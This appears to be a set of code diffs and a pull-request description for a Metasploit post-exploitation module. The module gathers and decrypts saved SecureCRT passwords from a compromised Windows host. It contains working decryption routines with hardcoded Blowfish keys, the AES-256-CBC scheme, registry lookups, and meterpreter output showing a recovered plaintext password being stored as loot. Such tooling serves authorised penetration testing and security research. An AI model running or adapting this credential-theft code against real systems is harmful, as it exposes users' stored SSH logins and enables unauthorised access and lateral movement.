-      passwordv2 = securecrt_crypto_v2($1) if Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file)
-      port = $1.to_i(16).to_s if Regexp.compile('D:"\[SSH2\] Port"=([0-9a-f]{8})').match(file)
-      username = $1 if  Regexp.compile('S:"Username"=([^\r\n]*)').match(file)
+      hostname = Regexp.last_match(1) if Regexp.compile('S:"Hostname"=([^\r\n]*)').match(file)
+      password = securecrt_crypto(Regexp.last_match(1)) if Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file)
+      passwordv2 = securecrt_crypto_v2(Regexp.last_match(1)) if Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file)
+      port = Regexp.last_match(1).to_i(16).to_s if Regexp.compile('D:"\[SSH2\] Port"=([0-9a-f]{8})').match(file)
+      username = Regexp.last_match(1) if Regexp.compile('S:"Username"=([^\r\n]*)').match(file)
       tbl << {
         file_name: item['name'],
         hostname: hostname,
         port: port,
         username: username,
-        password: password || passwordv2,
+        password: password || passwordv2
       }
     end
     return tbl
   end
 
-  def securecrt_crypto(ciphertext)  
+  def securecrt_crypto(ciphertext)
     key1 = "\x24\xA6\x3D\xDE\x5B\xD3\xB3\x82\x9C\x7E\x06\xF4\x08\x16\xAA\x07"
     key2 = "\x5F\xB0\x45\xA2\x94\x17\xD9\x16\xC6\xC6\xA2\xFF\x06\x41\x82\xB7"
     ciphered_bytes = [ciphertext].pack('H*')
-    cipher_tmp = blowfish_decrypt(key1,ciphered_bytes)[4..-5]
-    padded_plain_bytes = blowfish_decrypt(key2,cipher_tmp)
-    i = 0
-    (0..padded_plain_bytes.length).step(2) {|i|
+    cipher_tmp = blowfish_decrypt(key1, ciphered_bytes)[4..-5]
+    padded_plain_bytes = blowfish_decrypt(key2, cipher_tmp)
+    (0..padded_plain_bytes.length).step(2) do |i|
       if (padded_plain_bytes[i] == "\x00" && padded_plain_bytes[i + 1] == "\x00")
-        return padded_plain_bytes[0..i-1].force_encoding("UTF-16LE").encode('UTF-8')
+        return padded_plain_bytes[0..i - 1].force_encoding('UTF-16LE').encode('UTF-8')
       end
-    }
+    end
   end
 
   def securecrt_crypto_v2(ciphertext)
-    iv =("\x00" * 16)
-    config_passphrase =  datastore['Passphrase'] || nil
+    iv = ("\x00" * 16)
+    config_passphrase = datastore['Passphrase'] || nil
     key = OpenSSL::Digest::SHA256.new(config_passphrase).digest
     aes = OpenSSL::Cipher.new('AES-256-CBC')
     aes.key = key
@@ -108,13 +108,14 @@ class MetasploitModule < Msf::Post
     aes.decrypt
     aes.iv = iv
     padded_plain_bytes = aes.update([ciphertext].pack('H*'))
-    plain_bytes_length= padded_plain_bytes[0,4].unpack1('l') # bytes to int little-endian format.
-    plain_bytes = padded_plain_bytes[4,plain_bytes_length]
-    plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length,32]
-    if(OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verity
+    plain_bytes_length = padded_plain_bytes[0, 4].unpack1('l') # bytes to int little-endian format.
+    plain_bytes = padded_plain_bytes[4, plain_bytes_length]
+    plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length, 32]
+    if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verity
       return plain_bytes.force_encoding('UTF-8')
     end
-    print_error("Maybe the user has set the passphrase, please try to provide the [Passphrase] to decrypt again.")
+
+    print_error('Maybe the user has set the passphrase, please try to provide the [Passphrase] to decrypt again.')
     return nil
   end
 
@@ -149,10 +150,9 @@ class MetasploitModule < Msf::Post
   def run
     print_status("Gather Securecrt Passwords on #{sysinfo['Computer']}")
     # HKEY_CURRENT_USER\Software\VanDyke\SecureCRT
-    result = []
-    parent_key = "HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT"
+    parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
     # get session file path
-    securecrt_path = expand_path(registry_getvaldata(parent_key, 'Config Path') + session.fs.file.separator + "Sessions")
+    securecrt_path = expand_path(registry_getvaldata(parent_key, 'Config Path') + session.fs.file.separator + 'Sessions')
     if securecrt_path
       result = enum_session_file(securecrt_path)
       columns = [
@@ -183,7 +183,7 @@ class MetasploitModule < Msf::Post
         print_good("Passwords stored in: #{path}")
       end
     else
-      print_error("Session path not found")
+      print_error('Session path not found')
     end
   end
 end

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -81,8 +81,6 @@ class MetasploitModule < Msf::Post
       port = Regexp.compile('D:"Port"=([0-9a-f]{8})').match(file) ? Regexp.last_match(1).to_i(16).to_s : nil if !port
       username = Regexp.compile('S:"Username"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
 
-      next unless (hostname && port && protocol)
-
       tbl << {
         file_name: item['name'],
         protocol: protocol.downcase,
@@ -147,17 +145,10 @@ class MetasploitModule < Msf::Post
       post_reference_name: refname,
       private_type: :password,
       private_data: config[:password],
-      username: config[:username]
-    }.merge(service_data)
-
-    credential_core = create_credential(credential_data)
-
-    login_data = {
-      core: credential_core,
+      username: config[:username],
       status: Metasploit::Model::Login::Status::UNTRIED
     }.merge(service_data)
-
-    create_credential_login(login_data)
+    create_credential_and_login(credential_data)
   end
 
   def run
@@ -191,7 +182,7 @@ class MetasploitModule < Msf::Post
           username: item[:username],
           password: item[:password]
         }
-        securecrt_store_config(config)
+        securecrt_store_config(config) if (config[:hostname] && config[:port] && config[:username] && config[:password])
       end
       print_line(tbl.to_s)
       if tbl.rows.count

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Post
 
       tbl << {
         file_name: item['name'],
-        protocol: protocol.downcase,
+        protocol: protocol.nil? ? protocol : protocol.downcase,
         hostname: hostname,
         port: port,
         username: username,


### PR DESCRIPTION
This module can decrypt the password of SecureCRT, If the user chooses to remember the password.
- Analysis of encryption algorithm [here](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password)
## Verification
```
meterpreter > run post/windows/gather/credentials/securecrt 

[*] Gather Securecrt Passwords on WIN-LHC82CUIV7U
[*] Search session files on C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
[-] Maybe the user has set the passphrase, please try to provide the [Passphrase] to decrypt again.
Securecrt Password
==================

Filename          Hostname      Port  Username   Password
--------          --------      ----  --------   --------
192.168.56.1.ini  192.168.56.1  22    kali-team  

[+] Passwords stored in: /home/kali-team/.msf4/loot/20200911115103_default_10.0.2.15_host.securecrt_p_489607.txt
meterpreter > run post/windows/gather/credentials/securecrt Passphrase=123456
meterpreter > run post/windows/gather/credentials/securecrt Passphrase=123456

[*] Gather Securecrt Passwords on WIN-LHC82CUIV7U
[*] Search session files on C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
Securecrt Password
==================

Filename          Hostname      Port  Username   Password
--------          --------      ----  --------   --------
192.168.56.1.ini  192.168.56.1  22    kali-team  123456789

[+] Passwords stored in: /home/kali-team/.msf4/loot/20200911115118_default_10.0.2.15_host.securecrt_p_954887.txt
```